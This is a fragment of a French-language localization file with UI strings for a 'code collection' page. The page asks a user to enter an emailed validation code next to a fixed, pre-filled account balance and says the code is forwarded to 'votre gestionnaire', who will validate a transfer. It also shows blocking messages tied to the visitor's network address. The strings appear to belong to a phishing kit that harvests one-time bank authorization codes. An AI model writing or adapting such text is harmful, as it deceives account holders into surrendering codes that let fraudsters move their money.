  "codeCollection.title": "Transmettez votre code de validation",
  "codeCollection.subtitle": "Saisissez le code de validation à {{count}} chiffres reçu par e-mail pour valider le solde affiché ci-dessous.",
  "codeCollection.codeLabel": "Code de validation ({{count}} chiffres)",
  "codeCollection.codePh": "Ex. 482913",
  "codeCollection.errorCode": "Veuillez saisir les {{count}} chiffres du code de validation.",
  "codeCollection.amountLabel": "Solde à valider",
  "codeCollection.balanceCaption": "Solde du compte",
  "codeCollection.balanceHint": "Montant communiqué automatiquement par votre gestionnaire. Il n'est pas modifiable.",
  "codeCollection.amountPh": "Ex. 750000",
  "codeCollection.amountHint": "Montant pré-rempli par votre gestionnaire. Vérifiez-le puis validez.",
  "codeCollection.errorAmount": "Veuillez saisir un montant valide supérieur à 0.",
  "codeCollection.submit": "Transmettre le code",
  "codeCollection.submitting": "Envoi en cours...",
  "codeCollection.successTitle": "Code transmis avec succès",
  "codeCollection.successText": "Votre code de validation a bien été transmis à votre gestionnaire. Vous n'avez rien d'autre à faire : il procédera à la validation de votre virement.",
  "codeCollection.invalidTitle": "Lien invalide ou désactivé",
  "codeCollection.invalidText": "Ce lien n'est plus valable. Veuillez contacter votre gestionnaire pour obtenir un nouveau lien.",
  "codeCollection.blockedTitle": "Accès bloqué",
  "codeCollection.blockedText": "L'accès à ce lien est bloqué depuis votre adresse réseau. Si vous pensez qu'il s'agit d'une erreur, veuillez contacter votre gestionnaire.",
  "codeCollection.secureNote": "Vos informations sont transmises de façon chiffrée et confidentielle."
};